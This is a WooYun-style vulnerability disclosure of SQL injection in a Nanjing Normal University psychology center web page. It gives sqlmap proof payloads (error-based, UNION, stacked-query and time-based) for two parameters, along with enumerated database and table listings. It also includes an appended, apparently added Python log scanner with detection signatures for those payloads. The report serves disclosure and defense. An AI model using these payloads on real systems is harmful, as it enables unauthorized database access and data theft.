Vulnerability summary

Defect ID: wooyun-2015-0136135

Title: SQL injection vulnerability on a Nanjing Normal University site

Vendor: CCERT Education Network Emergency Response Team

Author: Hex

Submitted: 2015-08-23 20:12

Fixed: 2015-10-08 08:24

Published: 2015-10-08 08:24

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed to a third-party partner organization (CCERT Education Network Emergency Response Team) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-08-23: Details sent to the vendor; awaiting vendor handling
2015-08-24: Vendor confirmed; details disclosed to the vendor only
2015-09-03: Details disclosed to core white hats and relevant domain experts
2015-09-13: Details disclosed to regular white hats
2015-09-23: Details disclosed to intern white hats
2015-10-08: Details disclosed to the public

Summary:

SQL injection vulnerability on a Nanjing Normal University site

Details:

1# The vulnerability is in the Psychology Experimental Teaching Center website

http://**.**.**.**/xinli/TeaShow.aspx?TypeNo=47&teaNo=7


Both the TypeNo and teaNo parameters are injectable.

[Screenshot: error.png]


2# 47 databases

current user:    'xinli'
current database: 'NSXinLiXue'
current user is DBA: False
available databases [47]:
[*] BZBB_lw
[*] ChuangXinNS
[*] db_dike
[*] db_dndqjzw
[*] db_njsdjw
[*] db_njsfsy
[*] db_nsddlhj
[*] db_nsdhgxn
[*] db_nsdmba
[*] db_nsdMediaC
[*] db_nsdscw
[*] db_nsdsw
[*] db_nsdswyy
[*] db_nsdswzy
[*] db_nyspjc
[*] db_sdjxjy
[*] db_spaqjc
[*] JiaoCai
[*] master
[*] MBA
[*] model
[*] msdb
[*] njnulab
[*] njnupj
[*] nju
[*] nju2222
[*] njuold
[*] njupj2012
[*] Northwind
[*] NSD_ApplicationChemical
[*] NSD_Cnooc
[*] NSD_ElectricalEngineering
[*] NSD_ElectronicInformation
[*] NSD_TeacherSkills
[*] NSD_TeachingTeam
[*] nsddky_sy
[*] nsdsfjdzx
[*] nsdsfjdzxnew
[*] nsglxt
[*] NSHuaKe
[*] NSXinLiXue
[*] NY_JG
[*] pubs
[*] ShangXueYuannew
[*] tempdb
[*] zhongxin
[*] zhongxinold


3# Tables in the zhongxin database

Database: zhongxin
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| dbo.tongji | 1853 |
| dbo.dike_sqb | 1480 |
| dbo.chuanmei_News | 869 |
| dbo.news | 404 |
| dbo.faxue_News | 279 |
| dbo.meishu_News | 169 |
| dbo.dianqi_News | 135 |
| dbo.sw_News | 101 |
| dbo.jinnv_News | 95 |
| dbo.sw_links | 88 |
| dbo.dianqi_szdw | 82 |
| dbo.chuanmei_SmallClass | 71 |
| dbo.classurl | 69 |
| dbo.xinli_News | 69 |
| dbo.dike_szdw | 60 |
| dbo.dike_News | 55 |
| dbo.jiaoyu_News | 48 |
| dbo.meishu_SmallClass | 44 |
| dbo.faxue_down | 43 |
| dbo.huaxue_News | 43 |
| dbo.huaxue_SmallClass | 43 |
| dbo.meishu_szdw | 33 |
| dbo.dike_SmallClass | 30 |
| dbo.sw_down | 21 |
| dbo.meishu_sqb | 20 |
| dbo.dike_szdwzdy | 19 |
| dbo.dianqi_down | 18 |
| dbo.meishu_down | 18 |
| dbo.dike_down | 17 |
| dbo.faxue_SmallClass | 16 |
| dbo.huaxue_szdw | 15 |
| dbo.jinnv_down | 15 |
| dbo.xinli_down | 15 |
| dbo.chuanmei_BigClass | 13 |
| dbo.dike_BigClass | 13 |
| dbo.faxue_szdw | 13 |
| dbo.huaxue_BigClass | 13 |
| dbo.sw_SmallClass | 13 |
| dbo.sysconstraints | 13 |
| dbo.faxue_BigClass | 12 |
| dbo.jinnv_szdw | 12 |
| dbo.sw_szdw | 12 |
| dbo.faxue_sqb | 11 |
| dbo.chaunmei_sqb | 10 |
| dbo.chuanmei_down | 10 |
| dbo.dianqi_BigClass | 10 |
| dbo.dianqi_sqb | 10 |
| dbo.jiaoyu_down | 10 |
| dbo.jiaoyu_SmallClass | 10 |
| dbo.jinnv_sqb | 10 |
| dbo.sw_sqb | 10 |
| dbo.xinli_BigClass | 10 |
| dbo.xinli_sqb | 10 |
| dbo.chuanmei_links | 9 |
| dbo.jiaoyu_BigClass | 9 |
| dbo.jinnv_BigClass | 9 |
| dbo.jinnv_SmallClass | 9 |
| dbo.meishu_BigClass | 9 |
| dbo.sw_BigClass | 9 |
| dbo.xinli_SmallClass | 9 |
| dbo.jinnv_links | 8 |
| dbo.dianqi_SmallClass | 6 |
| dbo.link | 6 |
| dbo.Admin | 5 |
| dbo.huaxue_down | 5 |
| dbo.dianqi_links | 4 |
| dbo.dike_gg | 4 |
| dbo.meishu_gg | 4 |
| dbo.sw_gg | 4 |
| dbo.chuanmei_szdw | 3 |
| dbo.syssegments | 3 |
| dbo.xinli_Vote | 3 |
| dbo.chuanmei_gg | 2 |
| dbo.dianqi_gg | 2 |
| dbo.faxue_links | 2 |
| dbo.jiaoyu_gg | 2 |
| dbo.jinnv_gg | 2 |
| dbo.xinli_gg | 2 |
| dbo.faxue_gg | 1 |
| dbo.jiaoyu_szdw | 1 |
| dbo.xinli_links | 1 |
| dbo.xinli_szdw | 1 |
+-------------------------+---------+


4# Too many databases to go through one by one

Proof of vulnerability:

Place: GET
Parameter: TypeNo
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: TypeNo=47' AND 6611=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(120)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (6611=6611) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(104)+CHAR(108)+CHAR(58))) AND 'Kchf'='Kchf&teaNo=7
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: TypeNo=47' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(58)+CHAR(111)+CHAR(120)+CHAR(114)+CHAR(58)+CHAR(98)+CHAR(82)+CHAR(73)+CHAR(99)+CHAR(102)+CHAR(88)+CHAR(117)+CHAR(86)+CHAR(104)+CHAR(87)+CHAR(58)+CHAR(117)+CHAR(104)+CHAR(108)+CHAR(58)-- &teaNo=7
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TypeNo=47'; WAITFOR DELAY '0:0:5'--&teaNo=7
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: TypeNo=47' WAITFOR DELAY '0:0:5'--&teaNo=7
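As an added detection example (not part of the report or of the affected site's code), the following Python scans constructed IIS/W3C-style access-log lines for the four sqlmap technique families listed in the proof above, and flags any non-integer value in the two id parameters the report names; the log lines, parameter names and signature patterns are assumptions for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

INT_PARAMS = {"TypeNo", "teaNo"}  # the report's two parameters; both carry plain integer ids
# One signature per sqlmap technique family listed in the proof section (case-insensitive)
SIGNATURES = [
    ("error-based (CONVERT)", re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("stacked queries", re.compile(r";\s*WAITFOR\s+DELAY\b", re.I)),
    ("time-based blind", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
]
# Constructed IIS/W3C-style lines (not from the report): date time method stem query status
SAMPLE_LOG = """\
2015-08-23 12:00:01 GET /xinli/TeaShow.aspx TypeNo=47&teaNo=7 200
2015-08-23 12:00:02 GET /xinli/TeaShow.aspx TypeNo=47%27+AND+6611%3DCONVERT%28INT%2C%28SELECT+CHAR%2849%29%29%29+AND+%27Kchf%27%3D%27Kchf&teaNo=7 500
2015-08-23 12:00:03 GET /xinli/TeaShow.aspx TypeNo=47%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CCHAR%2858%29--+&teaNo=7 200
2015-08-23 12:00:09 GET /xinli/TeaShow.aspx TypeNo=47%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--&teaNo=7 200
2015-08-23 12:00:15 GET /xinli/TeaShow.aspx TypeNo=47%27+WAITFOR+DELAY+%270%3A0%3A5%27--&teaNo=7 200
"""

def normalize(value: str) -> str:
    """Peel up to three layers of %-encoding, fold /**/ comments and whitespace runs."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", re.sub(r"/\*.*?\*/", " ", value)).strip()

def classify_value(param: str, value: str) -> list[str]:
    """Findings for one parameter value; an empty list means nothing suspicious."""
    text = normalize(value)
    findings = []
    if param in INT_PARAMS and not re.fullmatch(r"-?\d+", text):
        findings.append("non-integer value")  # catches payloads no signature knows
    findings += [name for name, rx in SIGNATURES if rx.search(text)]
    if "stacked queries" in findings:  # '; WAITFOR' also matched the blind rule
        findings.remove("time-based blind")
    return findings

def scan_log(text: str) -> list[dict]:  # one record per (line, parameter) with findings
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if len(parts) < 6:
            continue  # malformed or truncated line
        for param, value in parse_qsl(parts[4], keep_blank_values=True):
            if findings := classify_value(param, value):
                hits.append({"line": lineno, "param": param, "findings": findings})
    return hits
```

The "non-integer value" check is the one that matters most for remediation: a parameter that is only ever an id should be parsed as an integer (or bound as a typed parameter) before it reaches the query, which removes every payload family above at once.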

Fix recommendation:

There are probably other injection points elsewhere; a full-site check is recommended.

Copyright notice: reproduction must credit the source, Hex@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 6

Confirmed: 2015-08-24 08:22

Vendor reply:

Notifying the user; handling in progress

Latest status:

None yet